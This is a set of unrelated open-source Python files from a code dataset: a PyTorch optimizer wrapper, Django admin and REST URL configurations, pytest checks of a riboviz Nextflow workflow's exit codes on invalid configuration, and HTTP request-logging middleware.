# ---- dataset boundary (StarcoderdataPython) ----
# id 104696
# -*- coding: utf-8 -*-
from torch.optim.optimizer import Optimizer
class Optimizers:
    """Group several torch optimizers behind a single optimizer-like facade,
    forwarding zero_grad() and step() to each of them in order."""

    def __init__(self, *op: Optimizer):
        # Keep the wrapped optimizers in the order they were given.
        self.optimizers = op

    def zero_grad(self):
        """Clear gradients on every wrapped optimizer."""
        for optimizer in self.optimizers:
            optimizer.zero_grad()

    def step(self):
        """Apply a parameter update with every wrapped optimizer."""
        for optimizer in self.optimizers:
            optimizer.step()
# ---- dataset boundary (StarcoderdataPython) ----
# Source: neuroticnerd/django-demo-app (id 3572867)
from django.contrib import admin
from . import models
class ActionAdmin(admin.ModelAdmin):
    """Admin configuration for Action: only title/description are editable;
    the audit (created/modified) fields are displayed read-only."""
    list_display = (
        'title', 'created_by', 'created_at', 'modified_by', 'modified_at'
    )
    list_filter = ('created_by', 'created_at')
    fields = ('title', 'description')
    readonly_fields = (
        'created_by', 'created_at', 'modified_by', 'modified_at'
    )
class ActionAssignmentAdmin(admin.ModelAdmin):
    """Admin configuration for ActionAssignment: the assignment itself is
    editable; the created_by/modified_by audit fields are read-only."""
    list_display = (
        'action', 'user', 'created_by', 'created_at',
    )
    fields = ('action', 'user', 'created_at', 'modified_at')
    readonly_fields = (
        'created_by', 'modified_by',
    )
# Register both models with the default admin site.
admin.site.register(models.Action, ActionAdmin)
admin.site.register(models.ActionAssignment, ActionAssignmentAdmin)
# ---- dataset boundary (StarcoderdataPython) ----
# id 8182207
"""
Nextflow error handling and exit code tests.
The test suite runs ``nextflow run prep_riboviz.nf``.
"""
import os.path
import shutil
import tempfile
import yaml
import pytest
import riboviz.test
from riboviz import hisat2
from riboviz import params
from riboviz.test.nextflow import run_nextflow
@pytest.fixture(scope="function")
def tmp_file():
    """
    Create a temporary file.

    :return: path to temporary file
    :rtype: str or unicode
    """
    handle, tmp_file = tempfile.mkstemp(prefix="tmp", suffix=".yaml")
    # mkstemp returns an open OS-level file descriptor; close it here,
    # otherwise one descriptor is leaked per test using this fixture.
    os.close(handle)
    yield tmp_file
    if os.path.exists(tmp_file):
        os.remove(tmp_file)
@pytest.fixture(scope="function")
def tmp_dir():
    """
    Create a temporary directory, removed again after the test completes.

    :return: directory
    :rtype: str or unicode
    """
    directory = tempfile.mkdtemp("tmp")
    yield directory
    shutil.rmtree(directory)
def test_no_sample_multiplex_fq_files(tmp_file):
    """
    Test that missing :py:const:`riboviz.params.FQ_FILES` and
    :py:const:`riboviz.params.MULTIPLEX_FQ_FILES` returns a non-zero
    exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[params.FQ_FILES] = []
    config[params.MULTIPLEX_FQ_FILES] = []
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_both_sample_multiplex_fq_files(tmp_file):
    """
    Test that providing both :py:const:`riboviz.params.FQ_FILES` and
    :py:const:`riboviz.params.MULTIPLEX_FQ_FILES` returns a non-zero
    exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    with open(riboviz.test.VIGNETTE_CONFIG) as vignette_file:
        vignette_config = yaml.load(vignette_file, yaml.SafeLoader)
    # Copy sample files into a multiplexed configuration: both must not
    # be provided at once.
    config[params.FQ_FILES] = vignette_config[params.FQ_FILES]
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_fq_files_not_found(tmp_file):
    """
    Test that non-existent :py:const:`riboviz.params.FQ_FILES` files
    raise a non-zero exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[params.FQ_FILES] = {
        "foo1": "foo1.fq", "foo2": "foo2.fq"
    }
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_multiplex_fq_files_not_found(tmp_file):
    """
    Test that non-existent
    :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
    files raise a non-zero exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[params.MULTIPLEX_FQ_FILES] = ["foo1.fq", "foo2.fq"]
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_no_sample_sheet(tmp_file):
    """
    Test that providing :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
    but no :py:const:`riboviz.params.SAMPLE_SHEET` returns a non-zero
    exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    del config[params.SAMPLE_SHEET]
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_sample_sheet_not_found(tmp_file):
    """
    Test that providing :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
    and a non-existent :py:const:`riboviz.params.SAMPLE_SHEET` file
    returns a non-zero exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[params.SAMPLE_SHEET] = "foo.tsv"
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
@pytest.mark.parametrize(
    "parameter",
    [params.INPUT_DIR,
     params.RRNA_FASTA_FILE,
     params.ORF_FASTA_FILE,
     params.ORF_GFF_FILE,
     params.ADAPTERS,
     params.ORF_INDEX_PREFIX,
     params.RRNA_INDEX_PREFIX,
     params.T_RNA_FILE,
     params.CODON_POSITIONS_FILE])
def test_no_mandatory_parameter(tmp_file, parameter):
    """
    Test that not providing a mandatory parameter returns a non-zero
    exit code.

    This test also covers the case where if one of
    :py:const:`riboviz.params.T_RNA_FILE` or
    :py:const:`riboviz.params.CODON_POSITIONS_FILE` is provided then
    then the other must be too.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    :param parameter: Parameter
    :type parameter: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    del config[parameter]
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
@pytest.mark.parametrize(
    "parameter",
    [params.INPUT_DIR,
     params.RRNA_FASTA_FILE,
     params.ORF_FASTA_FILE,
     params.ORF_GFF_FILE,
     params.FEATURES_FILE,
     params.T_RNA_FILE,
     params.CODON_POSITIONS_FILE,
     params.ASITE_DISP_LENGTH_FILE])
def test_file_not_found(tmp_file, parameter):
    """
    Test that providing a missing file for a file parameter returns a
    non-zero exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    :param parameter: Parameter
    :type parameter: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[parameter] = "foo"
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_extract_umis_no_umi_regexp(tmp_file):
    """
    Test that if :py:const:`riboviz.params.EXTRACT_UMIS` is `TRUE`
    but no :py:const:`riboviz.params.UMI_REGEXP` returns a non-zero
    exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.SIMDATA_UMI_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    del config[params.UMI_REGEXP]
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
@pytest.mark.parametrize(
    "parameter",
    [(params.BUFFER, -1),
     (params.COUNT_THRESHOLD, -1),
     (params.NUM_PROCESSES, 0),
     (params.MIN_READ_LENGTH, 0),
     (params.MAX_READ_LENGTH, 0)], ids=str)
def test_invalid_value(tmp_file, parameter):
    """
    Test that providing invalid values for a parameter returns a
    non-zero exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    :param parameter: Parameter and invalid value
    :type parameter: tuple(str or unicode, int)
    """
    name, value = parameter
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[name] = value
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_max_read_length_less_min(tmp_file):
    """
    Test that :py:const:`riboviz.params.MAX_READ_LENGTH` less than
    :py:const:`riboviz.params.MIN_READ_LENGTH` returns a non-zero exit
    code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[params.MIN_READ_LENGTH] = 10
    config[params.MAX_READ_LENGTH] = 9
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_build_indices_false_no_such_index_dir(tmp_file):
    """
    Test that :py:const:`riboviz.params.BUILD_INDICES` is false
    and no such index directory :py:const:`riboviz.params.INDEX_DIR`
    returns a non-zero exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[params.BUILD_INDICES] = False
    config[params.INDEX_DIR] = "NoSuchDirectory"
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_build_indices_false_no_such_orf_index_prefix(tmp_file, tmp_dir):
    """
    Test that :py:const:`riboviz.params.BUILD_INDICES` is false
    and no such files with prefixe
    :py:const:`riboviz.params.ORF_INDEX_PREFIX` returns a non-zero
    exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    :param tmp_dir: Path to temporary directory
    :type tmp_dir: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG) as config_file:
        config = yaml.load(config_file, yaml.SafeLoader)
    config[params.BUILD_INDICES] = False
    config[params.INDEX_DIR] = tmp_dir
    # Touch an empty file with the rRNA index prefix so that only the
    # ORF index files are missing.
    rrna_index = os.path.join(
        tmp_dir,
        hisat2.HT2_FORMAT.format(config[params.RRNA_INDEX_PREFIX], 1))
    open(rrna_index, 'w').close()
    config[params.ORF_INDEX_PREFIX] = "NoSuchOrfPrefix"
    with open(tmp_file, 'w') as out_file:
        yaml.dump(config, out_file)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, "Unexpected exit code %d" % exit_code
def test_build_indices_false_no_such_rrna_index_prefix(tmp_file, tmp_dir):
    """
    Test that :py:const:`riboviz.params.BUILD_INDICES` is false
    and no such files with prefix
    :py:const:`riboviz.params.RRNA_INDEX_PREFIX` returns a non-zero
    exit code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    :param tmp_dir: Path to temporary directory
    :type tmp_dir: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG, 'r') as f:
        config = yaml.load(f, yaml.SafeLoader)
    config[params.BUILD_INDICES] = False
    config[params.INDEX_DIR] = tmp_dir
    # Create an empty file bearing the ORF index prefix so the
    # workflow's check for that file succeeds and the failure is
    # attributable to the missing rRNA index alone.
    orf_index_file = os.path.join(
        tmp_dir,
        hisat2.HT2_FORMAT.format(config[params.ORF_INDEX_PREFIX], 1))
    with open(orf_index_file, 'w'):
        pass
    config[params.RRNA_INDEX_PREFIX] = "NoSuchRrnaPrefix"
    with open(tmp_file, 'w') as f:
        yaml.dump(config, f)
    exit_code = run_nextflow(tmp_file)
    assert exit_code != 0, \
        "Unexpected exit code %d" % exit_code
def test_validate_skip_inputs_fq_files_not_found(tmp_file):
    """
    Check that pointing :py:const:`riboviz.params.FQ_FILES` at files
    that do not exist still yields a zero exit code when both
    :py:const:`riboviz.params.VALIDATE_ONLY` and
    :py:const:`riboviz.params.SKIP_INPUTS` are enabled.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.VIGNETTE_CONFIG, 'r') as config_in:
        cfg = yaml.load(config_in, yaml.SafeLoader)
    cfg[params.FQ_FILES] = {"foo1": "foo1.fq", "foo2": "foo2.fq"}
    cfg[params.VALIDATE_ONLY] = True
    cfg[params.SKIP_INPUTS] = True
    with open(tmp_file, 'w') as config_out:
        yaml.dump(cfg, config_out)
    exit_code = run_nextflow(tmp_file)
    assert exit_code == 0, \
        "Unexpected exit code %d" % exit_code
def test_validate_skip_inputs_multiplex_fq_files_not_found(tmp_file):
    """
    Check that pointing :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
    at files that do not exist still yields a zero exit code when both
    :py:const:`riboviz.params.VALIDATE_ONLY` and
    :py:const:`riboviz.params.SKIP_INPUTS` are enabled.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as config_in:
        cfg = yaml.load(config_in, yaml.SafeLoader)
    cfg[params.MULTIPLEX_FQ_FILES] = ["foo1.fq", "foo2.fq"]
    cfg[params.VALIDATE_ONLY] = True
    cfg[params.SKIP_INPUTS] = True
    with open(tmp_file, 'w') as config_out:
        yaml.dump(cfg, config_out)
    exit_code = run_nextflow(tmp_file)
    assert exit_code == 0, \
        "Unexpected exit code %d" % exit_code
def test_validate_skip_inputs_sample_sheet_not_found(tmp_file):
    """
    Test that providing :py:const:`riboviz.params.MULTIPLEX_FQ_FILES`
    and a non-existent :py:const:`riboviz.params.SAMPLE_SHEET` file
    in the presence of both :py:const:`riboviz.params.VALIDATE_ONLY`
    and :py:const:`riboviz.params.SKIP_INPUTS` returns a zero exit
    code.

    :param tmp_file: Path to temporary file, to write configuration to
    :type tmp_file: str or unicode
    """
    # Start from the multiplexed simulated-data configuration, which
    # already sets MULTIPLEX_FQ_FILES, and point it at a sample sheet
    # that does not exist.
    with open(riboviz.test.SIMDATA_MULTIPLEX_CONFIG, 'r') as f:
        config = yaml.load(f, yaml.SafeLoader)
    config[params.SAMPLE_SHEET] = "foo.tsv"
    config[params.VALIDATE_ONLY] = True
    config[params.SKIP_INPUTS] = True
    with open(tmp_file, 'w') as f:
        yaml.dump(config, f)
    # With SKIP_INPUTS set, validation should tolerate the missing
    # sample sheet, so a zero exit code is expected.
    exit_code = run_nextflow(tmp_file)
    assert exit_code == 0, \
        "Unexpected exit code %d" % exit_code
| StarcoderdataPython |
4815374 | <gh_stars>0
# URL configuration: a DRF router generates the standard list/detail
# routes for each registered viewset; function-based auth views are
# wired up explicitly below.
from django.conf.urls import url, include

from rest_framework import routers

from app import views

router = routers.DefaultRouter()
router.register(r'users', views.UsersView)
# router.register(r'groups', views.GroupsView)
# router.register(r'permissions', views.PermissionsView)
router.register(r'exercise_types', views.ExerciseTypesView)
router.register(r'muscle_groups', views.MuscleGroupsView)
router.register(r'muscles', views.MusclesView)
router.register(r'exercise_lifts', views.ExerciseLiftsView)
router.register(r'workout_trackers', views.WorkoutTrackersView)
router.register(r'workout_tracker_exercises', views.WorkoutTrackerExercisesView)
# router.register(r'login_user', views.login_user)
# router.register(r'register_user', views.register_user)
# router.register(r'api-auth', include('rest_framework.urls', namespace='rest_framework'))

urlpatterns = [
    url(r'^', include(router.urls)),
    url(r'^login_user/$', views.login_user),
    url(r'^register_user/$', views.register_user),
    # url(r'^new_workout/$', views.create_new_workout),
    url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
]
| StarcoderdataPython |
12801436 | <filename>hs_formation/middleware/logger.py
from ..formation import (
_REQ_HTTP,
_RES_HTTP,
_CONTEXT,
_REQ_DURATION,
)
from toolz.curried import valfilter
def request_logger(logger):
    """Build a Formation middleware that logs each outgoing HTTP
    request and its response on the supplied structured logger.

    Falsy query parameters are dropped from the request log line;
    full headers are emitted at debug level only.
    """
    drop_falsy = valfilter(lambda value: value)

    def request_logger_middleware(ctx, next):
        request = ctx[_REQ_HTTP]
        log = logger.bind(**ctx.get(_CONTEXT, {}))
        log.info(
            "request.http",
            url=request.url,
            method=request.method,
            params=drop_falsy(request.params),
        )
        log.debug("request.http", headers=request.headers)

        ctx = next(ctx)

        response = ctx[_RES_HTTP]
        log.info(
            "response.http",
            url=response.request.url,
            status=response.status_code,
            method=response.request.method,
            elapsed=response.elapsed,
            size=len(response.content),
            duration_us=ctx.get(_REQ_DURATION, None),
        )
        log.debug("response.http", headers=response.headers)
        return ctx

    return request_logger_middleware
def async_request_logger(logger):
    """Async counterpart of :func:`request_logger`: builds a coroutine
    middleware that logs each outgoing HTTP request and its response
    on the supplied structured logger.

    Falsy query parameters are dropped from the request log line;
    full headers are emitted at debug level only.
    """
    drop_falsy = valfilter(lambda value: value)

    async def request_logger_middleware(ctx, next):
        request = ctx[_REQ_HTTP]
        log = await logger.bind(**ctx.get(_CONTEXT, {}))
        await log.info(
            "before request.http",
            url=request.url,
            method=request.method,
            params=drop_falsy(request.params),
        )
        await log.debug("before request.http", headers=request.headers)

        ctx = await next(ctx)

        response = ctx[_RES_HTTP]
        # Prefer the parsed body when a downstream middleware attached
        # one; otherwise fall back to the raw content for sizing.
        if hasattr(response, "parsed_content"):
            body = response.parsed_content
        else:
            body = response.content
        await log.info(
            "after response.http",
            url=response.request.url,
            status=response.status_code,
            method=response.request.method,
            elapsed=response.elapsed,
            size=len(body),
            duration_us=ctx.get(_REQ_DURATION, None),
        )
        await log.debug("after response.http", headers=response.headers)
        return ctx

    return request_logger_middleware
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.